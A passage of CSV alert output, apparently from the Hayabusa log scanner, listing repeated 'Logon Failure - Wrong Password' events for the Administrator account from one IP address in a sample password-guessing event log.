+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: 
